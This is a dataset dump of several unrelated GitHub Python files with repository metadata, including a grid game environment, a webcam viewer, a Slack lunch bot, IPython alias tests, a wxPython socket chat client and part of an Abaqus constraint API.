x)\n)\n\n\nclass Environment:\n \"\"\"\n Profit Game Environment\n \"\"\"\n\n def __init__(self, width, height, turns, products, time=120):\n \"\"\"initialize environment\n\n Args:\n width (int): width of the grid\n height (int): height of the grid\n turns (int): maximum number of turns\n products (dict): dictonary of all possible products; each with a resource recipe and the #points it is worth\n \"\"\"\n self.width = width\n self.height = height\n self.turns = turns\n self.products = products\n self.time = time\n\n self.task_generator = task_generator.TaskGenerator(self, seed=42)\n\n self.empty()\n\n def empty(self):\n self.buildings = []\n self.obstacles = []\n self.grid = np.full((self.height, self.width), \" \")\n\n def reset_resources(self):\n for building in self.buildings:\n building.reset_resources()\n\n def add_building(self, building, force=False):\n \"\"\"Adds the individual tiles of a new building to the grid, provided that it has a valid position (see `Environment.is_legal_position`);\n\n Args:\n building (Building): Factory, Deposit, Obstacle, ...\n force: only use this option if you are certain that it is a legal position (reduce computation)\n\n Returns:\n Building: returns building object or None if building could not be added\n \"\"\"\n assert building not in self.buildings\n\n if not force and not self.is_legal_position(building):\n return None\n\n for (tile_x, tile_y, element) in iter(building):\n if self.grid[tile_y, tile_x] == \" \":\n self.grid[tile_y, tile_x] = element\n else:\n # conveyor tunnel\n self.grid[tile_y, tile_x] = \"O\"\n\n if type(building) == Obstacle:\n self.obstacles.append(building)\n return building\n\n for other_building in self.buildings:\n if self.would_connect_to(other_building, building):\n other_building.add_connection(building)\n if self.would_connect_to(building, other_building):\n building.add_connection(other_building)\n\n self.buildings.append(building)\n\n return building\n\n def remove_building(self, building):\n \"\"\"Removes the individual tiles of a new building from the grid;\n\n Args:\n building (Building): Factory, Deposit, Obstacle, ...\n\n Returns:\n Building: returns removed building object\n \"\"\"\n assert building in self.buildings or building in self.obstacles\n\n for (tile_x, tile_y, element) in iter(building):\n if self.grid[tile_y, tile_x] == \"O\":\n self.grid[tile_y, tile_x] = \"<\"\n else:\n self.grid[tile_y, tile_x] = \" \"\n\n if type(building) == Obstacle:\n self.obstacles.remove(building)\n return building\n\n for other_building in self.buildings:\n if building in other_building.connections:\n other_building.remove_connection(building)\n building.clear_connections()\n\n self.buildings.remove(building)\n\n return building\n\n def add_buildings(self, buildings, force=False):\n for building in buildings:\n self.add_building(building, force=force)\n\n def is_legal_position(self, building):\n \"\"\"Check whether a building that is not yet part of the enviornment has a valid position\n\n Args:\n building (Building): Factory, Deposit, Obstacle, ...\n\n Returns:\n bool: validity of the position\n \"\"\"\n assert building not in self.buildings\n\n if self.is_out_off_bounds(building):\n return False\n if self.intersects_with_building(building):\n return False\n if self.violates_legal_connection(building):\n return False\n if self.violates_single_input(building):\n return False\n # technically not illegal, but very dumb move!\n if self.creates_connection_loop(building):\n return False\n return True\n\n def coords_out_off_bounds(self, x, y):\n if y < 0 or y >= self.height or x < 0 or x >= self.width:\n return True\n return False\n\n def is_tile_empty(self, x, y):\n if self.coords_out_off_bounds(x, y) or self.grid[y, x] != \" \":\n return False\n return True\n\n def is_out_off_bounds(self, building):\n # iterate over non-empty elements of the building\n for (tile_x, tile_y, element) in iter(building):\n if self.coords_out_off_bounds(tile_x, tile_y):\n return True\n return False\n\n def get_coords_around_position(self, x, y):\n top = x, y - 1\n right = x + 1, y\n bottom = x, y + 1\n left = x - 1, y\n return (top, right, bottom, left)\n\n def get_adjacent_positions(self, positions, empty_only=False):\n \"\"\"returns all coordinates adjacent to a list of positions.\n Use empty_only=True to filter out non-empty tiles.\n\n Args:\n positions (List((x, y)), or (x, y)): a list of multiple positions or a single (x, y) tuple\n empty_only (bool, optional): if True: only empty adjacent positions are returned. Defaults to False.\n\n Returns:\n List((x, y)): adjacent positions\n \"\"\"\n if type(positions) == tuple:\n return self.get_adjacent_positions([positions])\n\n adjacent_positions = []\n for x, y in positions:\n for adjacent_x, adjacent_y in self.get_coords_around_position(x, y):\n if not empty_only or self.is_tile_empty(adjacent_x, adjacent_y):\n adjacent_positions.append((adjacent_x, adjacent_y))\n return adjacent_positions\n\n def intersects_with_building(self, building):\n for (tile_x, tile_y, element) in iter(building):\n if not self.is_tile_empty(tile_x, tile_y):\n if self.conveyor_tunneling(tile_x, tile_y, element):\n continue\n return True\n return False\n\n def conveyor_tunneling(self, tile_x, tile_y, element):\n if element in [\"<\", \">\", \"^\", \"v\"]:\n if not self.coords_out_off_bounds(tile_x, tile_y):\n if self.grid[tile_y, tile_x] in [\"<\", \">\", \"^\", \"v\"]:\n return True\n return False\n\n def violates_legal_connection(self, building):\n for other_building in self.buildings:\n if self.would_connect_to(building, other_building):\n if type(other_building) not in LEGAL_CONNECTIONS[type(building)]:\n return True\n if self.would_connect_to(other_building, building):\n if type(building) not in LEGAL_CONNECTIONS[type(other_building)]:\n return True\n return False\n\n def violates_single_input(self, building):\n outgoing_connections = 0\n for other_building in self.buildings:\n if self.would_connect_to(building, other_building):\n outgoing_connections += 1\n elif self.would_connect_to(other_building, building):\n for connection in other_building.connections:\n if self.is_diagonal_input(connection, building):\n return True\n elif self.is_opposite_input(connection, building):\n return True\n\n if outgoing_connections > 1:\n return True\n return False\n\n def is_diagonal_input(self, building1, building2):\n inp1 = building1.get_input_positions()[0]\n inp2 = building2.get_input_positions()[0]\n\n x_diff, y_diff = inp1 - inp2\n return True if abs(x_diff) == 1 and abs(y_diff) == 1 else False\n\n def is_opposite_input(self, building1, building2):\n input1 = building1.get_input_positions()\n input2 = building2.get_input_positions()\n\n for inp1 in input1:\n for inp2 in input2:\n x_diff, y_diff = diff = inp1 - inp2\n\n if abs(x_diff) == 2 and abs(y_diff) == 0:\n x, y = inp1 - (diff // 2)\n if self.grid[(y, x)] == \"-\":\n return True\n elif abs(x_diff) == 0 and abs(y_diff) == 2:\n x, y = inp1 - (diff // 2)\n if self.grid[(y, x)] == \"-\":\n return True\n return False\n\n def creates_connection_loop(self, building):\n for other_building in self.buildings:\n if self.would_connect_to(building, other_building):\n if self.would_connect_to(other_building, building):\n return True\n return False\n\n def get_adjacent_inputs(self, x, y):\n return self.get_adjacent_elements(x, y, \"+\")\n\n def get_adjacent_outputs(self, x, y):\n return self.get_adjacent_elements(x, y, \"-\")\n\n def get_adjacent_elements(self, x, y, element):\n adjacent_positions = []\n for adjacent_x, adjacent_y in self.get_coords_around_position(x, y):\n if self.coords_out_off_bounds(adjacent_x, adjacent_y):\n continue\n if self.grid[adjacent_y, adjacent_x] == element:\n adjacent_positions.append((adjacent_x, adjacent_y))\n\n return adjacent_positions\n\n def get_min_distance(self, output_building, input_building):\n min_distance = None\n for out_x, out_y in output_building.get_output_positions():\n for in_x, in_y in input_building.get_input_positions():\n distance = self.get_tile_distance(out_x, out_y, in_x, in_y)\n if min_distance is None or distance < min_distance:\n min_distance = distance\n return min_distance\n\n def get_tile_distance(self, x1, y1, x2, y2):\n return abs(x1 - x2) + abs(y1 - y2)\n\n def would_connect_to(self, output_building, input_building):\n \"\"\"tests whether output_building's outputs can connect to input_building's inputs.\n buildings need not to be part of the environment.\n\n Args:\n output_building (building): building with outgoing connections\n input_building (building): building with incoming connections\n\n Returns:\n bool: True iff buildings output/input are adjacent\n \"\"\"\n return self.get_min_distance(output_building, input_building) == 1\n\n def is_connected(self, output_building, input_building, visited_buildings=[]):\n \"\"\"tests whether output_building is connected to input_building via other buildings\n Automatically checks for connection loops\n\n Args:\n output_building (building): building with outgoing connections\n input_building (building): building with incoming connections\n\n Returns:\n bool: True iff buildings are connected\n \"\"\"\n\n for next_building in output_building.connections:\n if next_building == input_building:\n return True\n elif next_building not in visited_buildings and self.is_connected(\n next_building, input_building, visited_buildings + [output_building]\n ):\n return True\n return False\n\n def get_deposits(self, subtype=None):\n return self.get_all_building_types(Deposit, subtype)\n\n def get_factories(self, subtype=None):\n return self.get_all_building_types(Factory, subtype)\n\n def get_all_building_types(self, building_cls, subtype=None):\n if subtype is None:\n return [b for b in self.buildings if type(b) == building_cls]\n return [\n b\n for b in self.buildings\n if type(b) == building_cls and b.subtype == subtype\n ]\n\n def get_possible_factories(self, subtype, max=10):\n factories = []\n for y in range(self.height):\n for x in range(self.width):\n factory = Factory((x, y), subtype)\n if self.is_legal_position(factory):\n factories.append(factory)\n\n random.shuffle(factories)\n return factories[:max]\n\n def get_possible_mines(self, deposit, factory=None, max=10):\n mines = []\n\n out_positions = deposit.get_output_positions()\n for x, y in self.get_adjacent_positions(out_positions, empty_only=True):\n for BuildingClass in LEGAL_CONNECTIONS[type(deposit)]:\n for subtype in range(BuildingClass.NUM_SUBTYPES):\n building = BuildingClass.from_input_position(x, y, subtype)\n if self.is_legal_position(building):\n mines.append(building)\n\n random.shuffle(mines)\n mines = mines[:max]\n if factory:\n mines = sorted(mines, key=lambda m: self.get_min_distance(m, factory))\n return mines\n\n def make_untargetable(self, false_targets):\n for false_target in false_targets:\n for x, y in false_target.get_input_positions():\n self.grid[(y, x)] = \"#\"\n\n def make_targetable(self, true_targets):\n for true_target in true_targets:\n for x, y in true_target.get_input_positions():\n self.grid[(y, x)] = \"+\"\n\n def from_json_file(self, filename):\n with open(filename) as f:\n task = json.load(f)\n\n return self.from_json(task)\n\n def from_json(self, task):\n self.width = task[\"width\"]\n self.height = task[\"height\"]\n self.turns = task[\"turns\"]\n self.products = task[\"products\"]\n if \"time\" in task:\n self.time = task[\"time\"]\n\n self.empty()\n\n for obj in task[\"objects\"]:\n classname = obj[\"type\"].capitalize()\n args = []\n args.append((obj[\"x\"], obj[\"y\"]))\n\n if \"subtype\" not in obj:\n args.append(0)\n else:\n args.append(obj[\"subtype\"])\n if \"width\" in obj:\n args.extend([obj[\"width\"], obj[\"height\"]])\n\n building = globals()[classname](*args)\n self.add_building(building, force=True)\n\n def __str__(self):\n \"\"\"printable representation;\n displayed as a ASCII grid and possibly additional information like #turns, products, ...\n\n Returns:\n str: string repesentation of the environment\n \"\"\"\n return f\"\\n{self.grid}\\n\".replace(\"'\", \"\")\n","repo_name":"tarexo/informaticup-profit","sub_path":"src/environment/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":14903,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"74555527439","text":"# !interpreter [optional-arg]\n# -*- coding: utf-8 -*-\n# Version \n\n\"\"\"\n{\n Only to display the Webcam frames for prepare\n}\n{License_info}\n\"\"\"\n\n# Futures\n# […]\n\n# Built-in/Generic Imports\nimport os\nimport sys\n# […]\n\n# Libs\nimport cv2\n\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Display the resulting frame\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n# […]\n\n# Own modules\n# from {path} import {class}\n# […]\n\n","repo_name":"zhajkun/Human_Action_Recognition","sub_path":"tools/Check_Webcam.py","file_name":"Check_Webcam.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"35381234384","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport os\nimport sys\nfrom random import sample\nimport json\n\nfile_path = os.path.realpath(__file__)\ndirectory_path = os.path.dirname(file_path)\nsys.path.append(os.path.join(directory_path, '../../src/lib'))\nsys.path.append(os.path.join(directory_path, '../../src/pf'))\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom slack_notify import send_slack_message_by_message_body\n\nscope = [\n'https://spreadsheets.google.com/feeds',\n'https://www.googleapis.com/auth/drive',\n]\njson_file_name = f'''{directory_path}/spreadsheet_access_key.json''' # 구글 api에서 받은 json파일 연결\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(json_file_name, scope)\ngc = gspread.authorize(credentials)\nspreadsheet_url = '구글시트 공유 url 삽입'\ndoc = gc.open_by_url(spreadsheet_url)\nworksheet = doc.worksheet('���트명')\n\n# 엑셀 모든 데이터 가져오기\nlist_of_lists = worksheet.get_all_values()\n\n# 중복 없이 그냥 랜덤으로 3개 선택\nidx1, idx2, idx3 = sample(range(1, len(list_of_lists)-1), 3)\n\nmenu_list = []\nmenu_list.append(list_of_lists[idx1])\nmenu_list.append(list_of_lists[idx2])\nmenu_list.append(list_of_lists[idx3])\n\nslack_url = 'https://hooks.slack.com/services/웹훅주소' \n\ntext_list = []\nfor menu in menu_list:\n # 컬럼 : 가게이름 / 메뉴 / 가격\n restaurant = menu[0]\n menu_name = menu[1]\n price = menu[2]\n text = f'- {restaurant} / *{menu_name}* / {price}원'\n text_list.append(text)\ntext_list_str = '\\n'.join(text_list)\n\n\n# 메세지 바디 만들기 : https://app.slack.com/block-kit-builder/TVBAZBQJJ\nslack_body = {\n\t\"blocks\": [\n\t\t{\n\t\t\t\"type\": \"header\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\"text\": \"오늘의 메뉴 예언\",\n\t\t\t\t\"emoji\": True\n\t\t\t}\n\t\t},\n\t\t{\n\t\t\t\"type\": \"section\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"mrkdwn\",\n\t\t\t\t\"text\": text_list_str\n\t\t\t},\n\t\t\t\"accessory\": {\n\t\t\t\t\"type\": \"image\",\n\t\t\t\t\"image_url\": \"https://pds.joins.com/news/component/joongang_sunday/2011/10/08212015.jpg\",\n\t\t\t\t\"alt_text\": \"alt text for image\"\n\t\t\t}\n\t\t},\n\t\t{\n\t\t\t\"type\": \"section\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"mrkdwn\",\n\t\t\t\t\"text\": \"맛집 정보 추가하기 :point_right::skin-tone-2::point_right::skin-tone-2:\"\n\t\t\t},\n\t\t\t\"accessory\": {\n\t\t\t\t\"type\": \"button\",\n\t\t\t\t\"text\": {\n\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\"text\": \"맛집 목록\",\n\t\t\t\t\t\"emoji\": True\n\t\t\t\t},\n\t\t\t\t\"value\": \"click_me_123\",\n\t\t\t\t\"url\": spreadsheet_url,\n\t\t\t\t\"action_id\": \"button-action\"\n\t\t\t}\n\t\t},\n\t\t{\n\t\t\t\"type\": \"divider\"\n\t\t}\n\t]\n}\n\n# 슬랙 전송\nsend_slack_message_by_message_body(slack_url, json.dumps(slack_body))\n","repo_name":"kym9129/LunchBot","sub_path":"src/lunchbot/lunchbot.py","file_name":"lunchbot.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"32889129536","text":"from distutils.core import setup, Extension\nimport sysconfig\n\ndef main():\n CFLAGS = ['-march=native', '-O3', '-pthread', '-Wall']\n\n module = Extension('fot_planner',\n sources = ['planner_package.cpp', 'AnytimeFrenetPlanner.cpp'],\n extra_compile_args = CFLAGS)\n\n setup(name=\"fot_planner\",\n version=\"1.0.0\",\n description=\"FOT Planner\",\n author=\"ERDOS Project\",\n ext_modules=[module])\n\nif __name__ == \"__main__\":\n main()","repo_name":"simonguozirui/c-python-planner","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26172944741","text":"\"\"\"Global console module.\"\"\"\n\nimport logging\n\nfrom rich.console import Console\nfrom rich.logging import RichHandler\n\n\ndef init_console() -> Console:\n \"\"\"Initialize console.\n\n Returns:\n Console: Console object.\n \"\"\"\n return Console()\n\n\ndef init_logger():\n \"\"\"Initialize logger.\"\"\"\n logging.basicConfig(\n level=logging.getLevelName('INFO'),\n format='%(message)s',\n datefmt='[%X]',\n handlers=[RichHandler()],\n )\n\n\ninit_logger()\nconsole = init_console()\n","repo_name":"ngngardner/traffic_sim","sub_path":"traffic_sim/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"74439188559","text":"from IPython.utils.capture import capture_output\n\nimport nose.tools as nt\n\ndef test_alias_lifecycle():\n name = 'test_alias1'\n cmd = 'echo \"Hello\"'\n am = _ip.alias_manager\n am.clear_aliases()\n am.define_alias(name, cmd)\n assert am.is_alias(name)\n nt.assert_equal(am.retrieve_alias(name), cmd)\n nt.assert_in((name, cmd), am.aliases)\n \n # Test running the alias\n orig_system = _ip.system\n result = []\n _ip.system = result.append\n try:\n _ip.run_cell('%{}'.format(name))\n result = [c.strip() for c in result]\n nt.assert_equal(result, [cmd])\n finally:\n _ip.system = orig_system\n \n # Test removing the alias\n am.undefine_alias(name)\n assert not am.is_alias(name)\n with nt.assert_raises(ValueError):\n am.retrieve_alias(name)\n nt.assert_not_in((name, cmd), am.aliases)\n \n\ndef test_alias_args_error():\n \"\"\"Error expanding with wrong number of arguments\"\"\"\n _ip.alias_manager.define_alias('parts', 'echo first %s second %s')\n # capture stderr:\n with capture_output() as cap:\n _ip.run_cell('parts 1')\n\n nt.assert_equal(cap.stderr.split(':')[0], 'UsageError')","repo_name":"khanhnamle1994/natural-language-processing","sub_path":"assignment1/.env/lib/python2.7/site-packages/IPython/core/tests/test_alias.py","file_name":"test_alias.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"29"} +{"seq_id":"42085392351","text":"#!/usr/bin/python3\n# _*_coding:utf-8_*_\n'''\n这是Micro Q的客户端\n技术点:\n 1.tkinter界面\n 2.类封装\n 3.线程\n 4.wx模块图形用户界面\n 5.消息以json文件格式发送\n'''\n# 导入相关模块\nfrom socket import *\nfrom threading import Thread\nimport wx\nimport os\nfrom tkinter import filedialog\nimport tkinter\nimport json\nimport wx.lib.agw.customtreectrl as CT\n\nroot = tkinter.Tk()\nroot.withdraw() # ****实现主窗口隐藏\n\n\n# 定义类,继承自父类wx.Frame\nclass QICQ(wx.Frame):\n # 初始化定义一些函数\n def __init__(self):\n global serverIp, serverPort\n serverPort = 6789\n serverIp = '127.0.0.1'\n\n # 初始化定义窗口属性(背景色,按钮,大小,位置)和线程\n\n # 设置主窗口,这里定义的是一个超类\n wx.Frame.__init__(self, parent=None, title='micro_Q', size=(600, 400))\n # 创建智能拉伸窗口\n panel = wx.Panel(self)\n panel.SetBackgroundColour((0, 153, 255))\n\n # 进行是否有选择的断言\n # 断言是否有选择文件框\n self.isChoosedFile = False\n self.dataOfChoosedFile = None\n self.fileName = None\n\n # 用户部分\n # 属性结构的全选或取消\n self.UserListTree = CT.CustomTreeCtrl(parent=panel, pos=(10, 10), size=(280, 300),\n style=wx.TR_FULL_ROW_HIGHLIGHT)\n # 创建根目录,添加的为根的名称\n self.rootID = self.UserListTree.AddRoot(\"已登录用户\")\n # 设置背景色\n self.UserListTree.SetBackgroundColour((224, 255, 255))\n # 添加子节点\n self.UserListTree.AppendItem(self.rootID, '第一个子节点')\n self.UserListTree.AppendItem(self.rootID, '第二个子节点')\n # 展开所有节点\n self.UserListTree.ExpandAll()\n self.UserList = []\n # 构建说明按钮\n self.info = wx.Button(parent=panel, pos=(100, 315), size=(80, 40), label=\"说明\")\n # 设置背景色\n self.info.SetBackgroundColour((224, 255, 255))\n\n # 操作部分\n # 文本输入框\n # 创建文本控件对象,设置前景颜色即文本颜色\n inputTip = wx.TextCtrl(parent=panel, pos=(300, 10), size=(130, 20), value=\"请输入你要发送的信息\", style=wx.TE_READONLY)\n # 设置背景颜色\n inputTip.SetBackgroundColour((224, 255, 255))\n # 设置分割线\n self.input = wx.TextCtrl(parent=panel, pos=(300, 30), size=(130, 50))\n self.input.SetForegroundColour((0, 153, 255))\n self.input.SetBackgroundColour((224, 255, 255))\n\n # 文件选择框\n self.fileChooser = wx.Button(parent=panel, pos=(440, 10), size=(130, 70), label=\"选择文件\")\n self.fileChooser.SetBackgroundColour((224, 255, 255))\n\n # 发送按钮\n self.send = wx.Button(parent=panel, pos=(300, 100), size=(275, 50), label=\"发送\")\n self.send.SetBackgroundColour((224, 255, 255))\n # 中间分割线\n separation = wx.TextCtrl(parent=panel, pos=(290, 170), size=(300, 2))\n separation.SetBackgroundColour((224, 255, 255))\n # 接收消息框\n receivedTip = wx.TextCtrl(parent=panel, pos=(300, 190), size=(135, 20), value=\"发送/接收到的消息列表\",\n style=wx.TE_READONLY)\n receivedTip.SetForegroundColour((0, 153, 255))\n receivedTip.SetBackgroundColour((224, 255, 255))\n # 设置文本框的滚动方式style\n self.messageList = wx.TextCtrl(parent=panel, size=(275, 120), pos=(300, 210),\n style=(wx.TE_MULTILINE | wx.HSCROLL | wx.TE_READONLY))\n self.messageList.SetBackgroundColour((224, 255, 255))\n self.messageList.SetForegroundColour((0, 153, 255))\n\n # 处理要发送的信息,进行初始值定义\n self.sendMessage = ''\n\n # 创建线程\n childThraed = Thread(target=self.socketHander)\n childThraed.setDaemon(True)\n childThraed.start()\n\n # 绑定按钮事件\n self.Bind(wx.EVT_BUTTON, self.OnInfoClicked, self.info)\n self.Bind(wx.EVT_BUTTON, self.OnSendClicked, self.send)\n self.Bind(wx.EVT_BUTTON, self.OnFileChooseClicked, self.fileChooser)\n\n # 说明按钮事件函数\n def OnInfoClicked(self, event):\n wx.MessageDialog(self, u'''\\r\\n\\r\\n\\r\\n\\t\\t1、互联的环境必须是在同一个局域网\\r\\n\n 2、必须先在左边选择发送对象且发送消息不为空才能发送消息\\r\\n\n 3、选择根目录{已登录用户}是群发��息,选择单个是私发消息\\r\\n\n 4、刚登录时最后一个ip是你自己的ip\\r\\n''', u\"警告\", wx.OK).ShowModal()\n\n # 处理发送按钮\n def OnSendClicked(self, event):\n # 获取输入框输入的值\n self.sendMessage = self.input.Value\n # 如果输入的值不存在且未选择文件,报出警告信息\n if len(self.sendMessage) == 0 and self.fileChooser == False:\n wx.MessageDialog(self, u\"请先输入(选择)待发送的消息(文件)\", u\"警告\", wx.OK).ShowModal()\n return None\n # 选择发送用户\n selected = self.UserListTree.GetSelection()\n selected = self.UserListTree.GetItemText(selected)\n # 如果未选择发送用户,报出警告信息\n if not selected:\n wx.MessageDialog(self, u\"请先选择用户或组\", u\"警告\", wx.OK).ShowModal()\n return None\n\n # 如果选择的是根节点,转发群消息\n if selected == \"已登录用户\":\n # 如果未选择文件\n if self.isChoosedFile == False:\n self.sendMessage = {\n \"type\": \"2\",\n \"sourceIP\": self.ip,\n \"destinationIP\": selected,\n \"content\": self.sendMessage\n }\n # 选择了文件\n else:\n self.sendMessage = {\n \"type\": \"5\",\n \"sourceIP\": self.ip,\n \"destinationIP\": selected,\n \"filename\": self.fileName,\n \"content\": self.dataOfChoosedFile\n }\n # 如果不是,转发给单人\n else:\n if self.isChoosedFile == False:\n self.sendMessage = {\n \"type\": \"1\",\n \"sourceIP\": self.ip,\n \"destinationIP\": selected,\n \"content\": self.sendMessage\n }\n else:\n self.sendMessage = {\n \"type\": \"4\",\n \"sourceIP\": self.ip,\n \"destinationIP\": selected,\n \"filename\": self.fileName,\n \"content\": self.dataOfChoosedFile\n }\n\n # 处理文件选择按钮\n def OnFileChooseClicked(self, event):\n filepath = filedialog.askopenfilename(title=\"请选择要发送的文件\")\n if len(filepath) > 0:\n filedicpath, fullflname = os.path.split(filepath)\n self.fileName = fullflname\n self.isChoosedFile = True\n with open(filepath, \"r\") as f:\n self.dataOfChoosedFile = f.read()\n\n print(self.fileName)\n\n # 消息收发处理\n def socketHander(self):\n self.clientSocket = socket(AF_INET, SOCK_STREAM)\n self.clientSocket.connect((serverIp, serverPort))\n self.clientSocket.settimeout(2)\n self.ip, self.port = self.clientSocket.getsockname()\n print(\"self ip\", self.ip)\n while True:\n # 发送消息\n if len(self.sendMessage) == 0:\n pass\n else:\n if self.isChoosedFile == True:\n self.clientSocket.send(json.dumps(self.sendMessage).encode(\"utf-8\"))\n self.messageList.AppendText(\"文件[\" + self.fileName + \"]发送成功\\r\\n\")\n self.fileName = None\n self.dataOfChoosedFile = None\n self.isChoosedFile = False\n self.sendMessage = \"\"\n\n else:\n self.clientSocket.send(json.dumps(self.sendMessage).encode(\"utf-8\"))\n self.messageList.AppendText(\"消息[\" + self.sendMessage.get(\"content\") + \"]发送成功\\r\\n\")\n self.input.SetLabelText(\"\")\n self.sendMessage = \"\"\n\n try:\n # 接收消息\n receivedMessage = self.clientSocket.recv(1024)\n receivedMessage = receivedMessage.decode(\"utf-8\")\n receivedMessage = json.loads(receivedMessage)\n print(receivedMessage)\n type = receivedMessage.get(\"type\")\n\n # 客户端接收服务端发来的转发消息\n if type == \"1\":\n print(\"客户端收到消息\")\n sourceIp = receivedMessage.get(\"sourceIP\")\n content = receivedMessage.get(\"content\")\n if sourceIp == self.ip:\n pass\n else:\n self.messageList.AppendText(\"来自:[\" + sourceIp + \"]的消息:[\" + content + \"]\\r\\n\")\n\n elif type == \"2\":\n # 客户端接收服务端发来的刷新列表请求\n self.userList = receivedMessage.get(\"content\")\n self.setUserList()\n\n elif type == \"3\":\n filename = receivedMessage.get(\"filename\")\n print(\"rrrr\", filename)\n with open(filename, \"w\") as f:\n f.write(receivedMessage.get(\"content\"))\n except:\n print(\"等待数据...\")\n pass\n pass\n\n # 设置添加用户\n def setUserList(self):\n self.UserListTree.DeleteChildren(self.rootID)\n for user in self.userList:\n # if user == self.ip:\n # continue\n self.UserListTree.AppendItem(self.rootID, user)\n pass\n\n # 关闭\n def OnClose(self, event):\n endMessage = {\n \"type\": \"3\",\n \"content\": \"bye\"\n }\n self.clientSocket.send(json.dumps(endMessage).encode(\"utf-8\"))\n self.Destroy()\n\n\nif __name__ == '__main__':\n global serverIp\n serverIp = input(\"请输入服务器ip\")\n app = wx.App()\n frame = QICQ()\n # frame.Bind(wx.EVT_CLOSE, frame.OnClosed)\n frame.Show()\n app.MainLoop()\n app.OnExit()\n","repo_name":"somebady111/micro-Q","sub_path":"micro Q-cilent.py","file_name":"micro Q-cilent.py","file_ext":"py","file_size_in_byte":10615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"17145797106","text":"from __future__ import annotations\n\nfrom typing import Union\n\nfrom typing_extensions import Literal\n\nfrom abqpy.decorators import abaqus_class_doc, abaqus_method_doc\n\nfrom ..Assembly.PartInstance import PartInstance\nfrom ..BasicGeometry.ModelDotArray import ModelDotArray\nfrom ..Model.ModelBase import ModelBase\nfrom ..Region.Region import Region\nfrom ..UtilityAndView.abaqusConstants import (\n BOTH,\n COMPUTED,\n DEFAULT,\n DOF_MODE_MPC,\n OFF,\n ON,\n SOLVER_DEFAULT,\n UNIFORM,\n Boolean,\n)\nfrom ..UtilityAndView.abaqusConstants import abaqusConstants as C\nfrom .AdjustPoints import AdjustPoints\nfrom .Coupling import Coupling\nfrom .DisplayBody import DisplayBody\nfrom .EmbeddedRegion import EmbeddedRegion\nfrom .Equation import Equation\nfrom .MultipointConstraint import MultipointConstraint\nfrom .RigidBody import RigidBody\nfrom .ShellSolidCoupling import ShellSolidCoupling\nfrom .Tie import Tie\n\n\n@abaqus_class_doc\nclass ConstraintModel(ModelBase):\n \"\"\"Abaqus creates a Model object named `Model-1` when a session is started.\n\n .. note::\n This object can be accessed by::\n\n mdb.models[name]\n \"\"\"\n\n @abaqus_method_doc\n def AdjustPoints(self, name: str, surface: Region, controlPoints: Region) -> AdjustPoints:\n \"\"\"This method creates an AdjustPoints object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].AdjustPoints\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n surface\n A Region object specifying the surface to which the **controlPoints** are adjusted.\n controlPoints\n A Region object specifying the constraint control points.\n\n Returns\n -------\n AdjustPoints\n An AdjustPoints object.\n \"\"\"\n self.constraints[name] = constraint = AdjustPoints(name, surface, controlPoints)\n return constraint\n\n @abaqus_method_doc\n def Coupling(\n self,\n name: str,\n surface: Region,\n controlPoint: Region,\n influenceRadius: Union[Literal[C.WHOLE_SURFACE], float],\n couplingType: Literal[C.STRUCTURAL, C.DISTRIBUTING, C.KINEMATIC],\n adjust: Boolean = OFF,\n localCsys: str | None = None,\n u1: Boolean = ON,\n u2: Boolean = ON,\n u3: Boolean = ON,\n ur1: Boolean = ON,\n ur2: Boolean = ON,\n ur3: Boolean = ON,\n weightingMethod: Literal[C.QUADRATIC, C.DISTRIBUTING, C.UNIFORM, C.LINEAR, C.CUBIC] = UNIFORM,\n alpha: float = 0.0,\n ) -> Coupling:\n \"\"\"This method creates a Coupling object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].Coupling\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n surface\n A Region object specifying the surface on which the coupling nodes are located.\n controlPoint\n A Region object specifying the constraint control point.\n influenceRadius\n The SymbolicConstant WHOLE_SURFACE or a Float specifying the influence radius.\n couplingType\n A SymbolicConstant specifying the coupling constraint type. Possible values are\n KINEMATIC, DISTRIBUTING, and STRUCTURAL.\n adjust\n A Boolean specifying if the control point will be adjusted (moved) to the surface. The\n point will be adjusted in the direction normal to the specified surface. The default\n value is OFF.\n localCsys\n None or a DatumCsys object specifying the initial orientation of the local coordinate\n system for the coupling's degrees of freedom. If **localCsys** = None, the coupling is\n defined in the global coordinate system. The default value is None.\n u1\n A Boolean specifying if the displacement component in the 1-direction is constrained to\n the reference node for a kinematic coupling constraint. The default value is ON.The **u1**\n argument applies only when **couplingType** = KINEMATIC.\n u2\n A Boolean specifying if the displacement component in the 2-direction is constrained to\n the reference node for a kinematic coupling constraint. The default value is ON.The **u2**\n argument applies only when **couplingType** = KINEMATIC.\n u3\n A Boolean specifying if the displacement component in the 3-direction is constrained to\n the reference node for a kinematic coupling constraint. The default value is ON.The **u3**\n argument applies only when **couplingType** = KINEMATIC.\n ur1\n A Boolean specifying if the rotational displacement component about the 